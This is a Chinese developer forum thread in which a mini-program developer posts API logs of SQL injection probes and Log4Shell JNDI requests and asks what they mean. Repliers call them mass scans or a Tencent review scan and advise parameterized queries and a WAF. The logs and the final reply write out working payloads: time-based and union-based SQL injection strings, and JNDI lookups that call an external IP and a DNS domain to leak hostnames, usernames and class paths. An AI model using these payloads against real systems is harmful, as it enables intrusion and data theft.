我在做的是一个小程序,有后台的 API 服务。
上周五突然发现有很多 SQL 注入和远程代码执行的调用。
Mar 15 16:48:15 lightsh ibkapi[1420640]: GET /products?q=%27%20union%20select%201--%20&count=30&cat=21&p=1 500 2.012 ms - 60
Mar 15 16:48:16 lightsh ibkapi[1420640]: GET /products?q=%25bf%2527%25bf%27%2527%2522%27%22%5C%5C%255C%250d%250a%2523%23&count=30&cat=21&p=1 500 4.498 ms - 60
Mar 15 16:48:16 lightsh ibkapi[1420640]: GET /products?q=%bf%27%bf'%27%22'"\\%5C%0d%0a%23%23&count=30&cat=21&p=1 500 16.973 ms - 60
Mar 15 16:49:27 lightsh ibkapi[1420640]: GET /products?q=&count=30&cat=21&p=%20OR%20%28SELECT%2AFROM%28SELECT%28SLEEP%284%29%29%29iiet%29%20limit%201%23 400 0.847 ms - 163
和这样:
Mar 15 17:31:35 lightsh ibkapi[1457656]: GET /orders/?status=-1&count=10&p=${jndi:rmi://183.47.120.213:1099/bypass4ab2c832c1448624ddd652713f2b4b1b-/-${hostName}} 400 1.655 ms - 201
Mar 15 17:31:35 lightsh ibkapi[1457656]: GET /orders/?status=-1&count=10&p=${jndi:rmi://hostname-${hostName}.username-${sys:user.name}.javapath-${sys:java.class.path}.f4a52b7ecb98e763293fb54f33f9bec8.4j2.mauu.mauu.me/} 400 1.722 ms - 258
Mar 15 17:31:36 lightsh ibkapi[1457656]: GET /orders/?status=-1&count=10&p=${jndi:ldap://183.47.120.213:1389/jdk185bf1616da873b6fb2299bbc60897c1c1-/-${hostName}} 400 1.749 ms - 201
Mar 15 17:31:36 lightsh ibkapi[1457656]: GET /orders/?status=${jndi:ldap://hostname-${hostName}.username-${sys:user.name}.javapath-${sys:java.class.path}.05d82899be802b7b14abf20f5a33c934.4j2.mauu.mauu.me/}&count=10&p=1 400 2.063 ms - 257
还有今天发现在请求 /.env
。
技术战是 NodeJS+MySQL ,看起来这些攻击没有得逞,我也在发现的第一时间停掉服务规避了。
然后修改了系统里校验参数和 SQL 语句的用法。
目前有 2 个问题:
1
lonelykid 249 天前
全网扫描 IP 和端口,还有你贴的日志把你服务器 IP 都泄露了。
|
2
Hopetree 249 天前
我发现只要是公开的网站都有很多类似的请求。
借贴说一下关于这种暴力请求的问题,是不是可以设置网络炸弹(就是给一些不存在的请求返回一个压缩文件,文件被解压的时候会非常大)来恶心一下这种请求?前几天看到网络炸弹这个还没试过,不知道对于这种暴力请求有效没? |
3
shinyzhu OP |
5
Puteulanus 249 天前 1
如果请求参数跟你的服务八竿子打不着,那估计就是扫描的了,可能会把常见的漏洞利用都给你试一遍
|
6
winterpotato 248 天前 1
用 gzip bumb 确实很坏,我做过一段时间,发现自己发出去的流量挺多的也不知道对面爆炸了没。
大概率是全网扫的,从自己的代码角度来看,查询语句要用 prepared statement ( Parameterized queries )这种避免被注入。 |
9
kimitaer 248 天前 1
应该是 tx 的安全检测, 之前我司也是发现了一批可疑请求, 检查了下 ua 可以看到是来自 tx 的检测
|
10
NGGTI 248 天前 1
一个是在做 SQL 注入攻击 sleep(4) 响应 0.847 ms 没成功。一个在做 log4 攻击,没用 java 就算了。
|
11
retanoj 248 天前 1
攻击不代表攻击成功。
“我也在发现的第一时间停掉服务规避了”,如果真对扫描类请求都这么敏感,那建议前面套一层 WAF |
14
impdx 247 天前 1
sql 拼接,开发不注意安全规范很容易 sql 注入。先规范自己的开发。之后考虑上个雷池 waf ,可以避免一些扫描器
|
15
AJ1if4 225 天前 1
散了吧,这个是小程序发布审核触发的腾讯安全审查。
{"code":"' union select 1--"} {"code":"' union select 1,2--"} {"code":"' union select 1,2,3--"} {"code":"' union select md5(3141592657),2,3--"} {"code":"' union select 1,md5(3141592657),3--"} {"code":"' union select 1,2,md5(3141592657)--"} {"code":"0e1PpF0w3budA23iup1w3qG30x0PpF0g' AND (SELECT*FROM(SELECT(SLEEP(3)))qtuo) limit 1#"} {"code":"0e1PpF0w3budA23iup1w3qG30x0PpF0g\") OR (SELECT*FROM(SELECT(SLEEP(4)))cnpj) limit 1#"} {"code":"0e1PpF0w3budA23iup1w3qG30x0PpF0g\")) AND (SELECT*FROM(SELECT(SLEEP(3)))pxzq) limit 1#"} {"code":"\")) OR (SELECT*FROM(SELECT(SLEEP(3)))puht) limit 1#"} {"code":"0e1PpF0w3budA23iup1w3qG30x0PpF0g\") AND (SELECT*FROM(SELECT(SLEEP(2)))cfva) limit 1#"} {"code":"' OR (SELECT*FROM(SELECT(SLEEP(3)))mnud) limit 1#"} {"code":"\" AND (SELECT*FROM(SELECT(SLEEP(3)))ondm) limit 1#"} {"code":"%25bf%2527%25bf%27%2527%2522%27%22%5C%5C%255C%250d%250a%2523%23"} {"code":"0e1PpF0w3budA23iup1w3qG30x0PpF0g"} {"code":"0e1PpF0w3budA23iup1w3qG30x0PpF0g%bf%27%bf'%27%22'\"\\\\%5C%0d%0a%23#"} {"code":"0e1PpF0w3budA23iup1w3qG30x0PpF0g"} {"code":"')) OR (SELECT*FROM(SELECT(SLEEP(2)))nawx) limit 1#"} {"code":"')) OR (SELECT*FROM(SELECT(SLEEP(3)))rywe) limit 1#"} {"code":"\" union select 1--"} {"code":"\" union select 1,2--"} {"code":"\" union select md5(3141592657),2--"} {"code":"\" union select 1,md5(3141592657)--"} {"code":"0e1PpF0w3budA23iup1w3qG30x0PpF0g\" union select 1--"} {"code":"0e1PpF0w3budA23iup1w3qG30x0PpF0g\" union select 1,2--"} {"code":"0e1PpF0w3budA23iup1w3qG30x0PpF0g\" union select 1,2,3--"} {"code":"0e1PpF0w3budA23iup1w3qG30x0PpF0g\" union select md5(3141592657),2,3--"} {"code":"0e1PpF0w3budA23iup1w3qG30x0PpF0g\" union select 1,md5(3141592657),3--"} {"code":"0e1PpF0w3budA23iup1w3qG30x0PpF0g\" union select 1,2,md5(3141592657)--"} {"code":"%bf%27%bf'%27%22'\"\\\\%5C%0d%0a%23#"} {"code":"0e1PpF0w3budA23iup1w3qG30x0PpF0g"} {"code":"0e1PpF0w3budA23iup1w3qG30x0PpF0g') OR (SELECT*FROM(SELECT(SLEEP(4)))biaw) limit 1#"} {"code":"0e1PpF0w3budA23iup1w3qG30x0PpF0g') OR (SELECT*FROM(SELECT(SLEEP(3)))mjpe) limit 1#"} {"code":"${jndi:rmi:\/\/183.47.120.213:1099\/bypassea22776815cddd786d4619bd5fa16902-\/-${hostName}}"} {"code":"\") OR (SELECT*FROM(SELECT(SLEEP(4)))qgzf) limit 1#"} {"code":"') OR (SELECT*FROM(SELECT(SLEEP(3)))kuav) limit 1#"} {"code":"0e1PpF0w3budA23iup1w3qG30x0PpF0g"} {"code":"\" OR (SELECT*FROM(SELECT(SLEEP(3)))cexg) limit 1#"} {"code":"\" OR (SELECT*FROM(SELECT(SLEEP(4)))fzmo) limit 1#"} {"code":"0e1PpF0w3budA23iup1w3qG30x0PpF0g\" OR (SELECT*FROM(SELECT(SLEEP(3)))jyyi) limit 1#"} {"code":"0e1PpF0w3budA23iup1w3qG30x0PpF0g\" OR (SELECT*FROM(SELECT(SLEEP(4)))bvvz) limit 1#"} {"code":"0e1PpF0w3budA23iup1w3qG30x0PpF0g"} {"code":"0e1PpF0w3budA23iup1w3qG30x0PpF0g AND (SELECT*FROM(SELECT(SLEEP(4)))fnfj) limit 1#"} {"code":"0e1PpF0w3budA23iup1w3qG30x0PpF0g AND (SELECT*FROM(SELECT(SLEEP(3)))wdcf) limit 1#"} {"code":"${jndi:rmi:\/\/hostname-${hostName}.username-${sys:user.name}.javapath-${sys:java.class.path}.32a822 .mauu.me\/}"} {"code":"0e1PpF0w3budA23iup1w3qG30x0PpF0g\" AND (SELECT*FROM(SELECT(SLEEP(2)))lozr) limit 1#"} {"code":"0e1PpF0w3budA23iup1w3qG30x0PpF0g\" AND (SELECT*FROM(SELECT(SLEEP(3)))hged) limit 1#"} {"code":"\")) AND (SELECT*FROM(SELECT(SLEEP(3)))ievk) limit 1#"} {"code":"\")) AND (SELECT*FROM(SELECT(SLEEP(4)))tpvq) limit 1#"} {"code":"0e1PpF0w3budA23iup1w3qG30x0PpF0g') AND (SELECT*FROM(SELECT(SLEEP(3)))hkzh) limit 1#"} {"code":"0e1PpF0w3budA23iup1w3qG30x0PpF0g') AND (SELECT*FROM(SELECT(SLEEP(2)))gisu) limit 1#"} {"code":"') AND (SELECT*FROM(SELECT(SLEEP(3)))kaes) limit 1#"} {"code":"') AND (SELECT*FROM(SELECT(SLEEP(4)))xbou) limit 1#"} {"code":"' AND (SELECT*FROM(SELECT(SLEEP(4)))dfwz) limit 1#"} {"code":"' AND (SELECT*FROM(SELECT(SLEEP(3)))yfcg) limit 1#"} {"code":"0e1PpF0w3budA23iup1w3qG30x0PpF0g%25bf%2527%25bf%27%2527%2522%27%22%5C%5C%255C%250d%250a%2523%23"} {"code":"0e1PpF0w3budA23iup1w3qG30x0PpF0g"} {"code":"\") AND (SELECT*FROM(SELECT(SLEEP(4)))rsqh) limit 1#"} |